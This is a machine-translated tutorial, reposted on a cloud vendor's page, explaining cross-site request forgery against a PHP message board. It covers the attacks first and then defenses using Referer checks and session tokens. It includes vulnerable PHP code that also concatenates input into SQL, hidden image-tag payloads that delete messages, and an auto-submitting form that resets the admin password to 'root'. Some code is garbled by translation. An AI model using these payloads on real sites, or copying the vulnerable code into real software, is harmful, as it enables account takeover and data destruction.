PHP Vulnerability Full solution (vi)-cross-site request forgery

Source: Internet
Author: User
Tags vars administrator password

This article mainly introduces the cross-site request forgery for PHP Web sites. In CSRF all attack modes include an attacker who forges an HTTP request that looks like another user initiated, in fact, tracking an HTTP request sent by a user is the attacker's purpose.

CSRF (Cross site request forgeries), which is intended to be spoofed across Web sites, is also written as XSRF. The attacker forges the HTTP request of the target user and then sends the request to a Web site with a CSRF vulnerability, which causes a cross-site request forgery attack after the Web site executes the request. The attacker uses a covert HTTP connection to allow the target user to click on the link without notice, because the user clicks on it, and the legitimate user has legal rights, so the target user can execute a specific HTTP link within the site to achieve the attacker's purpose.

For example, when buying a product on a shopping site, use the Http://www.shop.com/buy.php?item=watch&num=1,item parameter to determine what item to buy, num parameter determines the quantity to buy, If an attacker sends a link to a target user in a hidden way

, then if the target user is accidentally accessed, the number of purchases will be 1000

Instance

V1.0 Network PHP Message Board

Delete any message

delbook.php This page to delete messages

  1. Include_once ("dlyz.php"); //dlyz.php user authentication permission, when the permission is admin, can delete message
  2. Include_once (".. /conn.php ");
  3. $del =$_get["del"];
  4. $id =$_get["id"];
  5. if ($del = ="Data")
  6. {
  7. $ID _dele= Implode (",",$_post[' Adid ');
  8. $sql ="Delete from book where ID in (". $ID _dele. ")";
  9. mysql_query ($sql);
  10. }
  11. Else
  12. {
  13. $sql ="Delete from book where id=".  $id; //Pass the message ID to be deleted
  14. mysql_query ($sql);
  15. }
  16. Mysql_close ($conn);
  17. echo "";
  18. echo "alert (' Delete succeeded! '); ";
  19. echo "location= ' book.php ';";
  20. echo "";
  21. ?>

When we have admin permission, we will delete the message with ID 2 when we submit http://localhost/manage/delbook.php?id=2.

How to use:

We use a regular user message (source code), the content is

    1. "Delbook.php?id=2"/>
    2. "Delbook.php?id=3"/>
    3. "Delbook.php?id=4"/>
    4. "Delbook.php?id=5"/>

Insert 4 Pictures link to delete 4 ID messages Separately, then we go back to the homepage to see, there is no change. The picture doesn't show.

Now we re-login with the administrator account, to refresh the home page, you will find a message left one, the other in the image link designated ID number of the message, all are deleted.

The attacker inserted a hidden picture link in the message, this link has the function of deleting the message, and the attacker's own access to these image links, is not a permission, so see no effect, but when the administrator login, check this message, will execute the hidden link, and his permission is large enough, So the messages were deleted.

Modify Administrator Password

  1. pass.php
  2. if ($_get["Act"])
  3. {
  4. $username =$_post["username"];
  5. $sh =$_post["sh"];
  6. $gg =$_post["GG"];
  7. $title =$_post["title"];
  8. $copyright =$_post["Copyright"]."
    Design and production: Xiamen, the network Technology ";
  9. $password =md5 ($_post["password"]);
  10. if (emptyempty ($_post["password"]))
  11. {
  12. $sql ="Update gly set Username= '". $username. "', sh=." $sh.", gg= '". $gg. "', title= '". $title. "', copyright= '". $copyright. "' where id=1 ';
  13. }
  14. Else
  15. {
  16. $sql ="Update gly set Username= '". $username. "', password= '". $password. "', sh=." $sh.", gg= '". $gg. "', title= '". $title. "', copyright= '". $copyright. "' where id=1 ';
  17. }
  18. mysql_query ($sql);
  19. Mysql_close ($conn);
  20. echo "";
  21. echo "alert (' modified successfully! '); ";
  22. echo "location= ' pass.php ';";
  23. echo "";
  24. }

This file is used to modify some information about managing passwords and site settings, and we can directly construct the following form:

  1. <body>
  2. <form action="Http://localhost/manage/pass.php?act=xg" method="POST" name=" Form1 " id="Form1 ">
  3. <input type= "Radio" value="1" name="sh">
  4. <input type="Radio" name="sh" checked value="0">
  5. <input type="text" name="username" value="root">
  6. <input type="password" name="password" value="root">
  7. <input type="text" name="title" value="online PHP message board V1.0 (with audit function)" >
  8. <textarea name="GG" rows="6" cols="+" > Welcome you to install using the Network PHP message board V1.0 (with audit function)! textarea>
  9. <textarea name="Copyright" rows="6" cols="a" > the network PHP message this V1.0 All rights reserved: Xiamen Fate Network Technology 2005-2009<br/> To undertake website construction and system customization provide preferential host domain name textarea>
  10. form>
  11. Body>

Save As attack.html and put it on your website http://www.sectop.com/ attack.html, this page after access will automatically submit parameters to the target program's pass.php, the user name is changed to root, the password is changed to root, and then we go to the message board to send a message, hide this link, management access, his user name and password all changed to root

Precautionary approach

It is more difficult to guard against csrf than to guard against other attacks, because CSRF HTTP requests are made by attackers, but they are issued by the target user, and there are a few common ways to prevent them:

1, check the source of the Web page

2. Check the built-in hidden variables

3, use post, do not use get

Check the page source

Add the following red font code to the//pass.php header to verify data submission

  1. if ($_get["Act"])
  2. {
  3. if (Isset ($_server["Http_referer"))
  4. {
  5. $serverhost = $_server["SERVER_NAME"];
  6. $strurl = str_replace ("http://","" ",$_server[" Http_referer "]);
  7. $strdomain = Explode ("/",$strurl);
  8. $sourcehost = $strdomain [0];
  9. if (strncmp ($sourcehost, $serverhost, strlen ($serverhost)))
  10. {
  11. unset ($_post);
  12. echo "";
  13. echo "alert (' Data source exception! ');";
  14. echo "location= ' index.php ';";
  15. echo "";
  16. }
  17. }
  18. $username =$_post["username"];
  19. $sh =$_post["sh"];
  20. $gg =$_post["GG"];
  21. $title =$_post["title"];
  22. $copyright =$_post["Copyright"]."
    Design and production: Xiamen, the network Technology ";
  23. $password =md5 ($_post["password"]);
  24. if (emptyempty ($_post["password"]))
  25. {
  26. $sql ="Update gly set Username= '". $username. "', sh=." $sh.", gg= '". $gg. "', title= '". $title. "', copyright= '". $copyright. "' where id=1 ';
  27. }
  28. Else
  29. {
  30. $sql ="Update gly set Username= '". $username. "', password= '". $password. "', sh=." $sh.", gg= '". $gg. "', title= '". $title. "', copyright= '". $copyright. "' where id=1 ';
  31. }
  32. mysql_query ($sql);
  33. Mysql_close ($conn);
  34. echo "";
  35. echo "alert (' modified successfully! '); ";
  36. echo "location= ' pass.php ';";
  37. echo "";
  38. }

Check for built-in hidden variables

We built a hidden variable and a session variable in the form, and then checked whether the hidden variable and the session variable were equal to determine whether the same page was called

  1. Php
  2. Include_once ("dlyz.php");
  3. Include_once (".. /conn.php ");
  4. if ($_get["Act"])
  5. {
  6. if (!isset ($_session["post_id"))
  7. {
  8. Generate a unique ID and use MD5 to encrypt
  9. $post_id = MD5 (uniqid (rand (), true));
  10. Creating Session Variables
  11. $_session["post_id"] = $post _id;
  12. }
  13. Check for equality
  14. if (Isset ($_session["post_id"))
  15. {
  16. Not equal
  17. if ($_session["post_id"]! = $_post["post_id"])
  18. {
  19. Clear Post variables
  20. Unset ($_post);
  21. echo "<script language= ' javascript '>";
  22. echo "alert (' Data source exception! ');";
  23. echo " location= ' index.php ';";
  24. echo "script>";
  25. }
  26. }
  27. ......
  28. <input type="reset" name= "Submit2" value="reset">
  29. <input type="hidden" name="post_id" value= "php echo $_session[" post_id"];? > ">
  30. TD>TR>
  31. Table>
  32. Form>
  33. Php
  34. }
  35. Mysql_close ($conn);
  36. ?>
  37. Body>
  38. HTML>

Use post, do not use get

When passing form fields, be sure to use post, do not use GET, handle variables and do not use $_request directly

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.